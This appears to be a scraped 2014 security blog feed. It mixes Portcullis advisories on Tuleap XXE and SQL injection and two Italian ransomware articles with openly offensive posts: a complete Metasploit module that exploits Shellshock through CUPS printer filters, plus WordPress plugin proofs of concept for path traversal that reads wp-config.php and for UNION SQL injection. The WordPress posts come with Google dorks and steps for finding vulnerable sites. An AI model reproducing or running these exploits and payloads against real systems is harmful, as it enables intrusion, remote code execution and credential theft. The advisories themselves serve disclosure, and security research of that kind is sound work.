          <field REF="F13"/>
        </criteria>
      </criterias>
      <renderers>
        <renderer type="table" rank="0" chunksz="15" multisort="15">
          <name>Results</name>
          <columns>
            <field REF="F2"/>
            <field REF="F8"/>
            <field REF="F6"/>
            <field REF="F24"/>
            <field REF="F3"/>
          </columns>
        </renderer>
        <renderer type="plugin_graphontrackersv5" rank="1">
            <name>Charts</name>
            <description>Graphic Report</description>
            <charts>
                <chart type="pie" width="600" height="400" rank="0" base="F19">
                    <title>Status</title>
                    <description>Number of Artifacts by Status</description>
                </chart>
                <chart type="bar" width="600" height="400" rank="1" base="F11">
                    <title>Severity</title>
                    <description>Number of Artifacts by severity level</description>
                </chart>
                <chart type="pie" width="600" height="400" rank="2" base="F24">
                    <title>Assignment</title>
                    <description>Number of Artifacts by Assignee</description>
                </chart>
            </charts>
        </renderer>
      </renderers>
    </report>
    <report is_default="0">
      <name>Default</name>
      <description>The system default artifact report</description>
      <criterias>
        <criteria rank="0">
          <field REF="F19"/>
        </criteria>
        <criteria rank="1">
          <field REF="F24"/>
        </criteria>
        <criteria rank="2">
          <field REF="F6"/>
        </criteria>
        <criteria rank="3">
          <field REF="F2"/>
        </criteria>
        <criteria rank="4">
          <field REF="F13"/>
        </criteria>
      </criterias>
      <renderers>
        <renderer type="table" rank="0" chunksz="15" multisort="15">
          <name>Results</name>
          <columns>
            <field REF="F2"/>
            <field REF="F8"/>
            <field REF="F6"/>
            <field REF="F24"/>
            <field REF="F3"/>
          </columns>
        </renderer>
      </renderers>
    </report>
  </reports>
  <workflow>
    <field_id REF="F19"/>
    <is_used>1</is_used>
    <transitions>
        <transition>
            <from_id REF="null"/>
            <to_id REF="F19-V0"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V1"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V2"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V1"/>
            <to_id REF="F19-V2"/>
        </transition>
        <transition>
            <from_id REF="F19-V1"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V3"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V4"/>
            <to_id REF="F19-V5"/>
        </transition>
        <transition>
            <from_id REF="F19-V5"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V5"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V1"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V2"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V2"/>
            <to_id REF="F19-V4"/>
        </transition>
    </transitions>
  </workflow>
  <permissions>
    <permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F5" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F6" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F9" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F9" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F9" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F14" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F14" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F14" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F15" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F15" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F15" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F19" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F19" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F19" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F20" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F20" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F20" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F22" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F22" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F22" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F24" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F24" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F24" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F26" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F26" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F26" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F28" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F29" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F29" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F29" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F31" ugroup="UGROUP_PROJECT_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F32" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F32" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F32" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F33" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F33" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F33" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F34" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F34" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F34" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <!--TODO TRACKER_ADMIN <permission scope="field" REF="F31" ugroup="UGROUP_PLUGIN_TRACKER_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/> -->
  </permissions>
</tracker>
 
-----------------------------12077103611061
Content-Disposition: form-data; name="name"
 
Bugs
-----------------------------12077103611061
Content-Disposition: form-data; name="description"
 
Bugs Tracker
-----------------------------12077103611061
Content-Disposition: form-data; name="itemname"
 
bug
-----------------------------12077103611061
Content-Disposition: form-data; name="Create"
 
Créer
-----------------------------12077103611061--
 
 
2) The server will respond giving back a 'tracker number' in the response. The response contain link to specific "tracker" which will be similar to the following:
 
 
https://[ip]/plugins/tracker/?group_id=102&tracker=12
 
 
3) Using retrieved tracker number and URL, a XXE can be trigerred by visiting the retrieved URL:
 
 
https://[ip]/plugins/tracker/?group_id=102&tracker=12
 
 
Further details at:
 
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7177/
 
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
 
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
 
###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company, 
registered in England in accordance with the Companies 
Act under number 02763799. The registered office 
address of Portcullis Computer Security Limited is: 
Portcullis House, 2 Century Court, Tolpits Lane, Watford, 
United Kingdom, WD18 9RS.  
The information in this email is confidential and may be 
legally privileged. It is intended solely for the addressee. 
Any opinions expressed are those of the individual and 
do not represent the opinion of the organisation. Access 
to this email by persons other than the intended recipient 
is strictly prohibited.
If you are not the intended recipient, any disclosure, 
copying, distribution or other action taken or omitted to be 
taken in reliance on it, is prohibited and may be unlawful. 
When addressed to our clients any opinions or advice 
contained in this email is subject to the terms and 
conditions expressed in the applicable Portcullis Computer 
Security Limited terms of business.
###############################################################
 
#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared 
by MailMarshal.
#####################################################################################

(18)

29Oct/140

Tuleap 7.4.99.5 Blind SQL Injection

Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.56.108/plugins/docman/?group_id=100
Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
Connection: keep-alive
 
 
Note: In order to exploit this vulnerability a attacker needs to be in position to access '/plugins/docman/' URN.
 
 
Further details at:
 
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7176/
 
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
 
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
 
###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company, 
registered in England in accordance with the Companies 
Act under number 02763799. The registered office 
address of Portcullis Computer Security Limited is: 
Portcullis House, 2 Century Court, Tolpits Lane, Watford, 
United Kingdom, WD18 9RS.  
The information in this email is confidential and may be 
legally privileged. It is intended solely for the addressee. 
Any opinions expressed are those of the individual and 
do not represent the opinion of the organisation. Access 
to this email by persons other than the intended recipient 
is strictly prohibited.
If you are not the intended recipient, any disclosure, 
copying, distribution or other action taken or omitted to be 
taken in reliance on it, is prohibited and may be unlawful. 
When addressed to our clients any opinions or advice 
contained in this email is subject to the terms and 
conditions expressed in the applicable Portcullis Computer 
Security Limited terms of business.
###############################################################
 
#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared 
by MailMarshal.
#####################################################################################

(18)

28Oct/140

Rimozione Virus Ransomware anche per utenti non esperti

Un ransomware è un virus che cripta tutti i dati all'interno dell'hard disk e impedisce il regolare avvio di windows mostrando una schermata dove viene chiesto del denaro, in cambio dei dati sull'hard disk..
 
 
Ecco una guida passo passo per rimuovere il virus...
Occorrente:
1)Il pc infettato ( chiaramente )
2)Un CD o DVD vuoto
3)Un altro PC ( o il pc infetto con una connessione a internet)
 
 
Procedimento:
Questi tipi di Virus essenzialmente sono fatti per mandare in panico l'utente medio.... quindi uno dei consigli che dovete seguire: mantenervi calmi e rimanere concentrati su come si comporta il virus... perchè come tutto.. anche i virus hanno delle vulnerabilità.
Detto questo... possiamo iniziare....
1)All’avvio di Windows premere ripetutamente il tasto f8…. Se il PC dovesse avviarsi ugualmente provare con altri tasti (f1,f2,f3,f4 ecc…) se invece tutto va a buon fine, dalle voci che usciranno tramite le freccette di selezione selezionare MODALITà PROVVISORIA CON RETE…..
 
 
1-BIS)Alcuni virus riescono a bloccare anche la modalità prvvisoria... in questo caso dirigiamoci su un computer NON INFETTO e che abbia un lettore cd/DVD a questo punto passiamo al punto 2
 
 
2)Cerchiamo Kaspersky Rescue Disk su google scarichiamolo e masterizziamolo su cd-r
 
 
3) Torniamo adesso sul pc infetto e seguiamo i passaggi del punto 4
Premiamo ripetutamente f2 o Canc quando si visualizza la schermata del produttore.... andiamo nella scheda di avvio o boot order e evidenziamo la voce dvd-r (o cd-r, a volte si trova anche il modello del vostro lettore DVD) , una volta evidenziata premere f4 o f5 finchè non sarà prima nella lista…
A questo punto premiamo esc, poi enter e a seguire di nuovo enter (se evidenziato yes).
Ora spegniamo e riaccendiamo il PC…. Una schermata ci dirà di premere un tasto per avviare da dvd o cd –rom, facciamolo….
Ora siamo nel rescue disk, avviamo la scansione completa e attendiamo il report, poi mettiamo in quarantena tutti i file rilevati….
 
 
E BYE BYE VIRUS!!
 
 
Spero di esservi stato d aiuto a tutti !!!
 
 
Link Rescue Disk : link link sito originale : http://rescuedisk.kasperskylabs.com/..._rescue_10.iso
P.S. Prima di premere ripetutamente il tasto avanti nell'installer di Softonic noncuranti dei PUP (Potentially Unwanted Program) che verranno installati proviamo a leggere e a togliere le spunte nei programmi e nelle toolbar che non vogliamo

Fonte: http://www.tomshw.it/forum/sicurezza/421733-guida-rimozione-virus-ransomware-anche-per-utenti-non-esperti.html
(73)

28Oct/140

Ransomware allarme web il malware truffa per telefono

RANSOMWARE

Da un momento all'altro può capitare di trovarsi ostaggio dei pirati informatici, sul proprio computer inopinatamente bloccato.
E poterlo sbloccare soltanto telefonando a un numero a pagamento, salatissimo.
Tutta colpa di un malware - fa sapere il Centro Nazionale Anticrimine Informatico per la Protezione delle Infrastrutture critiche del Servizio Polizia Postale e delle Comunicazioni - che si chiama "Ransomware", un trojan noto a molti utenti della rete (solo quelli che usano sui loro computer sistemi operativi WIndows) per averli colpiti già dal 2006.

Ai tempi impediva l'utilizzo del computer per poi richiedere un codice di sblocco, ottenibile collegandosi a siti che richiedono l'acquisto di beni o servizi a pagamento, realizzando una vera e propria estorsione.
In alcune delle precedenti versioni, infatti, la vittima veniva costretta ad acquistare farmaci o altri prodotti su siti russi e solo successivamente veniva fornito il codice di sblocco. Adesso l'attacco è frontale: nell'ultima versione il PC infetto mostra all'avvio il seguente messaggio: Attention! Windows activation period is exceeded. This windows copy is illegal and not registered properly. The further work is not possible.
For activating this copy of windows you must enter registration code. This code you can find in your windows distribution package. If you not find them you can receive it by the phone: 899 021 233 Registration code must be entered not later then three days, if it entered later the unlocking is not possible.
Ovvero: se volete attivare la vostra copia di WIndows dovete inserire un condice di registrazione che potete ricevere via telefono chiamando a questo numero.
Il tutto dovete farlo entro tre giorni altrimenti lo sblocco del computer non sarà possibile.
Di fatto il PC non subirà alcun danno significativo, ma se la vittima dovesse telefonare al numero visualizzato nel messaggio spenderebbe 1,75 euro al minuto e non riceverebbe alcun codice, ma verrebbe semplicemente reindirizzato ad un altro servizio telefonico a pagamento.

Gli utenti italiani non sono i soli destinatari della truffa, perché il malware è programmato per riconoscere la provenienza geografica e la lingua del target, pertanto sono previste numerazioni anche per utenti di Austria, Belgio e Svizzera, per i quali la Polizia di Stato, attraverso il CNAIPIC, ha già inoltrato la segnalazione alle competenti Autorità. Inoltre, oltre alle indagine volte ad identificare l'autore della truffa, è stata avviata la procedura per l'inibizione dell'utenza 899 021 233, affinché non vi possano essere ulteriori danni per gli utenti della rete.

Fonte: http://www.repubblica.it/tecnologia/2011/04/29/news/allarme_malware-15513920/
(41)

28Oct/140

CUPS Filter Bash Environment Variable Code Injection

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'CUPS Filter Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a post-auth code injection in specially crafted
        environment variables in Bash, specifically targeting CUPS filters
        through the PRINTER_INFO and PRINTER_LOCATION variables by default.
      },
      'Author' => [
        'Stephane Chazelas', # Vulnerability discovery
        'lcamtuf', # CVE-2014-6278
        'Brendan Coles <bcoles[at]gmail.com>' # msf
      ],
      'References' => [
        ['CVE', '2014-6271'],
        ['CVE', '2014-6278'],
        ['EDB', '34765'],
        ['URL', 'https://access.redhat.com/articles/1200223'],
        ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
      ],
      'Privileged' => false,
      'Arch' => ARCH_CMD,
      'Platform' => 'unix',
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => "\x00\x0A\x0D",
          'DisableNops' => true
        },
      'Compat' =>
        {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'generic bash awk ruby'
        },
      # Tested:
      # - CUPS version 1.4.3 on Ubuntu 10.04 (x86)
      # - CUPS version 1.5.3 on Debian 7 (x64)
      # - CUPS version 1.6.2 on Fedora 19 (x64)
      # - CUPS version 1.7.2 on Ubuntu 14.04 (x64)
      'Targets' =>  [[ 'Automatic Targeting', { 'auto' => true } ]],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014',
      'License' => MSF_LICENSE
    ))
    register_options([
      Opt::RPORT(631),
      OptBool.new('SSL', [ true, 'Use SSL', true ]),
      OptString.new('USERNAME', [ true, 'CUPS username', 'root']),
      OptString.new('PASSWORD', [ true, 'CUPS user password', '']),
      OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),
      OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])
    ], self.class)
  end
 
  #
  # CVE-2014-6271
  #
  def cve_2014_6271(cmd)
    %{() { :;}; $(#{cmd}) & }
  end
 
  #
  # CVE-2014-6278
  #
  def cve_2014_6278(cmd)
    %{() { _; } >_[$($())] { echo -e "\r\n$(#{cmd})\r\n" ; }}
  end
 
  #
  # Check credentials
  #
  def check
    @cookie = rand_text_alphanumeric(16)
    printer_name = rand_text_alphanumeric(10 + rand(5))
    res = add_printer(printer_name, '')
    if !res
      vprint_error("#{peer} - No response from host")
      return Exploit::CheckCode::Unknown
    elsif res.headers['Server'] =~ /CUPS\/([\d\.]+)/
      vprint_status("#{peer} - Found CUPS version #{$1}")
    else
      print_status("#{peer} - Target is not a CUPS web server")
      return Exploit::CheckCode::Safe
    end
    if res.body =~ /Set Default Options for #{printer_name}/
      vprint_good("#{peer} - Added printer successfully")
      delete_printer(printer_name)
    elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
      vprint_error("#{peer} - Authentication failed")
    elsif res.code == 426
      vprint_error("#{peer} - SSL required - set SSL true")
    end
    Exploit::CheckCode::Detected
  end
 
  #
  # Exploit
  #
  def exploit
    @cookie = rand_text_alphanumeric(16)
    printer_name = rand_text_alphanumeric(10 + rand(5))
 
    # Select target CVE
    case datastore['CVE']
    when 'CVE-2014-6278'
      cmd = cve_2014_6278(payload.raw)
    else
      cmd = cve_2014_6271(payload.raw)
    end
 
    # Add a printer containing the payload
    # with a CUPS filter pointing to /bin/bash
    res = add_printer(printer_name, cmd)
    if !res
      fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.")
    elsif res.body =~ /Set Default Options for #{printer_name}/
      print_good("#{peer} - Added printer successfully")
    elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
      fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.")
    elsif res.code == 426
      fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.")
    else
      fail_with(Failure::Unknown, "#{peer} - Could not add printer.")
    end
 
    # Add a test page to the print queue.
    # The print job triggers execution of the bash filter
    # which executes the payload in the environment variables.
    res = print_test_page(printer_name)
    if !res
      fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.")
    elsif res.body =~ /Test page sent; job ID is/
      vprint_good("#{peer} - Added test page to printer queue")
    elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
      fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.")
    elsif res.code == 426
      fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.")
    else
      fail_with(Failure::Unknown, "#{peer} - Could not add test page to print queue.")
    end
 
    # Delete the printer
    res = delete_printer(printer_name)
    if !res
      fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.")
    elsif res.body =~ /has been deleted successfully/
      print_status("#{peer} - Deleted printer '#{printer_name}' successfully")
    elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)
      vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.")
    elsif res.code == 426
      vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.")
    else
      vprint_warning("#{peer} - Could not delete printer '#{printer_name}'")
    end
  end
 
  #
  # Add a printer to CUPS
  #
  def add_printer(printer_name, cmd)
    vprint_status("#{peer} - Adding new printer '#{printer_name}'")
 
    ppd_name = "#{rand_text_alphanumeric(10 + rand(5))}.ppd"
    ppd_file = <<-EOF
*PPD-Adobe: "4.3"
*%==== General Information Keywords ========================
*FormatVersion: "4.3"
*FileVersion: "1.00"
*LanguageVersion: English
*LanguageEncoding: ISOLatin1
*PCFileName: "#{ppd_name}"
*Manufacturer: "Brother"
*Product: "(Brother MFC-3820CN)"
*1284DeviceID: "MFG:Brother;MDL:MFC-3820CN"
*cupsVersion: 1.1
*cupsManualCopies: False
*cupsFilter: "application/vnd.cups-postscript 0 #{datastore['RPATH']}/bash"
*cupsModelNumber: #{rand(10) + 1}
*ModelName: "Brother MFC-3820CN"
*ShortNickName: "Brother MFC-3820CN"
*NickName: "Brother MFC-3820CN CUPS v1.1"
*%
*%==== Basic Device Capabilities =============
*LanguageLevel: "3"
*ColorDevice: True
*DefaultColorSpace: RGB
*FileSystem: False
*Throughput: "12"
*LandscapeOrientation: Plus90
*VariablePaperSize: False
*TTRasterizer: Type42
*FreeVM: "1700000"
 
*DefaultOutputOrder: Reverse
*%==== Media Selection ======================
 
*OpenUI *PageSize/Media Size: PickOne
*OrderDependency: 18 AnySetup *PageSize
*DefaultPageSize: BrLetter
*PageSize BrA4/A4:        "<</PageSize[595 842]/ImagingBBox null>>setpagedevice"
*PageSize BrLetter/Letter:      "<</PageSize[612 792]/ImagingBBox null>>setpagedevice"
EOF
 
    pd = Rex::MIME::Message.new
    pd.add_part(ppd_file, 'application/octet-stream', nil, %(form-data; name="PPD_FILE"; filename="#{ppd_name}"))
    pd.add_part("#{@cookie}", nil, nil, %(form-data; name="org.cups.sid"))
    pd.add_part("add-printer", nil, nil, %(form-data; name="OP"))
    pd.add_part("#{printer_name}", nil, nil, %(form-data; name="PRINTER_NAME"))
    pd.add_part("", nil, nil, %(form-data; name="PRINTER_INFO")) # injectable
    pd.add_part("#{cmd}", nil, nil, %(form-data; name="PRINTER_LOCATION")) # injectable
    pd.add_part("file:///dev/null", nil, nil, %(form-data; name="DEVICE_URI"))
 
    data = pd.to_s
    data.strip!
 
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin'),
      'ctype' => "multipart/form-data; boundary=#{pd.bound}",
      'data' => data,
      'cookie' => "org.cups.sid=#{@cookie};",
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
    )
  end
 
  #
  # Queue a printer test page
  #
  def print_test_page(printer_name)
    vprint_status("#{peer} - Adding test page to printer queue")
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'printers', printer_name),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'cookie' => "org.cups.sid=#{@cookie}",
      'vars_post' => {
        'org.cups.sid' => @cookie,
        'OP' => 'print-test-page'
      }
    )
  end
 
  #
  # Delete a printer
  #
  def delete_printer(printer_name)
    vprint_status("#{peer} - Deleting printer '#{printer_name}'")
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin'),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'cookie' => "org.cups.sid=#{@cookie}",
      'vars_post' => {
        'org.cups.sid' => @cookie,
        'OP' => 'delete-printer',
        'printer_name' => printer_name,
        'confirm' => 'Delete Printer'
      }
    )
  end
 
end

(44)

28Oct/140

WordPress Download Manager Arbitrary File Download

# WordPress Download Manager Plugin - Arbitrary File Download
# CWE: CWE-98
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 25/10/2014
# Vendor Homepage: https://wordpress.org/plugins/download-manager/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl:/plugins/download-manager/
 
# VUL: /views/file_download.php?fname=
 
 or:
 
 /file_download.php?fname=
 
# PoC : 
 
 http://WEBSITE/wp-content/plugins/document_manager/views/file_download.php?fname=../../wp-config.php
 
 
# Xploit: Find one website with use /plugins/download-manager/ && ADD TO Link:/views/file_download.php?fname=../../wp-config.php

(68)

28Oct/140

WordPress HTML5 / Flash Player SQL Injection

# WordPress HTML5 and FLash PLayer Plugin SQL Injection
# CWE: CWE-89
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 24/10/2014
# Vendor Homepage: https://wordpress.org/plugins/player/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: inurl: "Index of" +inurl:/wp-content/plugins/player/
 
# PoC : 
 
http://WEBSITE/wordpress/wp-content/plugins/player/settings.php?playlist=1&theme=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,table_name,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from information_schema.tables where table_schema=database()--
 
 
# Xploit: Are vulnerable sites that have the settings.php file inside the dir /player/...
 
 ~ And after see this file we need plus this string on link "?playlist=1&theme=1"
 
OR:
 
 ~ Search to parameters vuls from settings.php with google dorks.

(45)